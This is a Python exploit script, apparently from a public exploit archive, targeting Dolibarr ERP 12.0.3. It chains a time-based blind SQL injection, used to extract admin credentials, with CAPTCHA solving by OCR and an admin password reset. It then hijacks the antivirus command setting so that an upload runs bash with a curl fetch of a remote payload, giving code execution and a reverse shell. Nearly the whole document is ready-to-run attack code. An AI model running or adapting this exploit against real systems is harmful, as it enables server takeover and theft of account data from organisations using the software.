Dolibarr version 12.0.3 remote SQL injection exploit that achieves remote code execution.
752f6eae60abdb96ea2bf446f22afe9d2446db44df565231549fcd6896d20f74
# Exploit Title: Dolibarr 12.0.3, SQLi to RCE
# Date: 2/12/2020
# Exploit Author: coiffeur
# Write Up: https://therealcoiffeur.github.io/c10010, https://therealcoiffeur.github.io/c10011
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads.php, https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/12.0.3/
# Version: 12.0.3
import argparse
import binascii
import random
import re
from io import BytesIO
from urllib.parse import quote_plus as qp
import bcrypt
import pytesseract
import requests
from bs4 import BeautifulSoup
from PIL import Image
DELTA = None
DEBUG = 1
SESSION = requests.session()
TRESHOLD = 0.80
DELAY = 1
LIKE = "%_subscription"
COLUMNS = ["login", "pass_temp"]
def usage():
banner = """NAME: Dolibarr SQLi to RCE (authenticate)
SYNOPSIS: python3 sqli_to_rce_12.0.3.py -t <BASE_URL> -u <USERNAME> -p <PASSWORD>
EXAMPLE:
python3 sqli_to_rce_12.0.3.py -t "https://127.0.0.1/projects/dolibarr/12.0.3/htdocs/" -u test -p test
AUTHOR: coiffeur
"""
print(banner)
exit(-1)
def hex(text):
return "0x" + binascii.hexlify(text.encode()).decode()
def hash(password):
salt = bcrypt.gensalt()
hashed = bcrypt.hashpw(password.encode(), salt)
return hashed.decode()
def authenticate(url, username, password):
datas = {
"actionlogin": "login",
"loginfunction": "loginfunction",
"username": username,
"password": password
}
r = SESSION.post(f"{url}index.php", data=datas,
allow_redirects=False, verify=False)
if r.status_code != 302:
if DEBUG:
print(f"[x] Authentication failed!")
return 0
if DEBUG:
print(f" [*] Authenticated as: {username}")
return 1
def get_antispam_code(base_url):
code = ""
while len(code) != 5:
r = SESSION.get(f"{base_url}core/antispamimage.php", verify=False)
temp_image = f"/tmp/{random.randint(0000,9999)}"
with open(temp_image, "wb") as f:
f.write(r.content)
with open(temp_image, "rb") as f:
code = pytesseract.image_to_string(
Image.open(BytesIO(f.read()))).split("\n")[0]
for char in code:
if char not in "aAbBCDeEFgGhHJKLmMnNpPqQRsStTuVwWXYZz2345679":
code = ""
break
return code
def reset_password(url, login):
for _ in range(5):
code = get_antispam_code(url)
headers = {
"Referer": f"{url}user/passwordforgotten.php"
}
datas = {
"action": "buildnewpassword",
"username": login,
"code": code
}
r = SESSION.post(url=f"{url}user/passwordforgotten.php",
data=datas, headers=headers, verify=False)
if r.status_code == 200:
for response in [f"Request to change password for {login} sent to", f"Demande de changement de mot de passe pour {login} envoyée"]:
if r.text.find(response):
if DEBUG:
print(f" [*] Password reset using code: {code}")
return 1
return 0
def change_password(url, login, pass_temp):
r = requests.get(url=f"{url}user/passwordforgotten.php?action=validatenewpassword&username={qp(login)}&passwordhash={hash(pass_temp)}",
allow_redirects=False, verify=False)
if r.status_code == 302:
if DEBUG:
print(f" [*] Password changed: {pass_temp}")
return 1
return 0
def change_binary(url, command, parameters):
headers = {
"Referer": f"{url}admin/security_file.php"
}
datas = {
"action": "updateform",
"MAIN_UPLOAD_DOC": "2048",
"MAIN_UMASK": "0664",
"MAIN_ANTIVIRUS_COMMAND": command,
"MAIN_ANTIVIRUS_PARAM": parameters
}
r = SESSION.post(url=f"{url}admin/security_file.php",
data=datas, headers=headers, verify=False)
if r.status_code == 200:
for response in ["Record modified successfully", "Enregistrement modifié avec succès"]:
if response in r.text:
if DEBUG:
print(f" [*] Binary's path changed")
return 1
return 0
def trigger_exploit(url):
headers = {
"Referer": f"{url}admin/security_file.php"
}
files = {
"userfile[]": open("junk.txt", "rb"),
}
datas = {
"sendit": "Upload"
}
if DEBUG:
print(f" [*] Triggering reverse shell")
r = SESSION.post(url=f"{url}admin/security_file.php",
files=files, data=datas, headers=headers, verify=False)
if r.status_code == 200:
for response in ["File(s) uploaded successfully", "The antivirus program was not able to validate the file (file might be infected by a virus)", "Fichier(s) téléversés(s) avec succès", "L'antivirus n'a pas pu valider ce fichier (il est probablement infecté par un virus) !"]:
if response in r.text:
if DEBUG:
print(f" [*] Exploit done")
return 1
return 0
def get_version(url):
r = SESSION.get(f"{url}index.php", verify=False)
x = re.findall(
r"Version Dolibarr [0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}", r.text)
if x:
version = x[0]
if "12.0.3" in version:
if DEBUG:
print(f" [*] {version} (exploit should work)")
return 1
if DEBUG:
print(f"[*] Version may not be vulnerable")
return 0
def get_privileges(url):
r = SESSION.get(f"{url}index.php", verify=False)
x = re.findall(r"id=\d", r.text)
if x:
id = x[0]
if DEBUG:
print(f" [*] id found: {id}")
r = SESSION.get(f"{url}user/perms.php?{id}", verify=False)
soup = BeautifulSoup(r.text, 'html.parser')
for img in soup.find_all("img"):
if img.get("title") in ["Actif", "Active"]:
for td in img.parent.parent.find_all("td"):
privileges = [
"Consulter les commandes clients", "Read customers orders"]
for privilege in privileges:
if privilege in td:
if DEBUG:
print(
f" [*] Check privileges: {privilege}")
return 1
if DEBUG:
print(f"[*] At the sight of the privileges, the exploit may fail")
return 0
def check(url, payload):
headers = {
"Referer": f"{url}commande/stats/index.php?leftmenu=orders"
}
datas = {"object_status": payload}
r = SESSION.post(url=f"{url}commande/stats/index.php",
data=datas, headers=headers, verify=False)
return r.elapsed.total_seconds()
def evaluate_delay(url):
global DELTA
deltas = []
payload = f"IF(0<1, SLEEP({DELAY}), SLEEP(0))"
for _ in range(4):
deltas.append(check(url, payload))
DELTA = sum(deltas)/len(deltas)
if DEBUG:
print(f" [+] Delta: {DELTA}")
def get_tbl_name_len(url):
i = 0
while 1:
payload = f"IF((SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_name LIKE {hex(LIKE)})>{i}, SLEEP(0), SLEEP({DELAY}))"
if check(url, payload) >= DELTA*TRESHOLD:
return i
if i > 100:
print(f"[x] Exploit failed")
exit(-1)
i += 1
def get_tbl_name(url, length):
tbl_name = ""
for i in range(1, length+1):
min, max = 0, 127-1
while min < max:
mid = (max + min) // 2
payload = f"IF((SELECT ASCII(SUBSTR(table_name,{i},1)) FROM information_schema.tables WHERE table_name LIKE {hex(LIKE)})<={mid}, SLEEP({DELAY}), SLEEP(0))"
if check(url, payload) >= DELTA*TRESHOLD:
max = mid
else:
min = mid + 1
tbl_name += chr(min)
return tbl_name
def get_elt_len(url, tbl_name, column_name):
i = 0
while 1:
payload = f"IF((SELECT LENGTH({column_name}) FROM {tbl_name} LIMIT 1)>{i}, SLEEP(0), SLEEP({DELAY}))"
if check(url, payload) >= DELTA*TRESHOLD:
return i
if i > 100:
print(f"[x] Exploit failed")
exit(-1)
i += 1
def get_elt(url, tbl_name, column_name, length):
elt = ""
for i in range(1, length+1):
min, max = 0, 127-1
while min < max:
mid = (max + min) // 2
payload = f"IF((SELECT ASCII(SUBSTR({column_name},{i},1)) FROM {tbl_name} LIMIT 1)<={mid} , SLEEP({DELAY}), SLEEP(0))"
if check(url, payload) >= DELTA*TRESHOLD:
max = mid
else:
min = mid + 1
elt += chr(min)
return elt
def get_row(url, tbl_name):
print(f" [*] Dump admin's infos from {tbl_name}")
infos = {}
for column_name in COLUMNS:
elt_length = get_elt_len(url, tbl_name, column_name)
infos[column_name] = get_elt(url, tbl_name, column_name, elt_length)
if DEBUG:
print(f" [+] Infos: {infos}")
return infos
def main(url, username, password):
# Check if exploit is possible
print(f"[*] Requirements:")
if not authenticate(url, username, password):
print(f"[x] Exploit failed!")
exit(-1)
get_version(url)
get_privileges(url)
print(f"\n[*] Starting exploit:")
# Evaluate delay
evaluate_delay(url)
print(f" [*] Extract prefix (using table: {LIKE})")
tbl_name_len = get_tbl_name_len(url)
tbl_name = get_tbl_name(url, tbl_name_len)
prefix = f"{tbl_name.split('_')[0]}_"
if DEBUG:
print(f" [+] Prefix: {prefix}")
# Dump admin's infos
user_table_name = f"{prefix}user"
infos = get_row(url, user_table_name)
if not infos["login"]:
print(f"[x] Exploit failed!")
exit(-1)
# Reset admin's passworrd
if DEBUG:
print(f" [*] Reseting {infos['login']}'s password")
if not reset_password(url, infos["login"]):
print(f"[x] Exploit failed!")
exit(-1)
infos = get_row(url, user_table_name)
# Remove cookies to logout
# Change admin's password
# Login as admin
SESSION.cookies.clear()
if not change_password(url, infos['login'], infos['pass_temp']):
print(f"[x] Exploit failed!")
exit(-1)
authenticate(url, infos['login'], infos['pass_temp'])
# Change antivirus's binary path
# Trigger reverse shell
change_binary(url, "bash", '-c "$(curl https://127.0.0.1:8000/poc.txt)"')
trigger_exploit(url)
return 0
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-t", help="Base URL of Dolibarr")
parser.add_argument("-u", help="Username")
parser.add_argument("-p", help="Password")
args = parser.parse_args()
if not args.t or not args.u or not args.p:
usage()
main(args.t, args.u, args.p)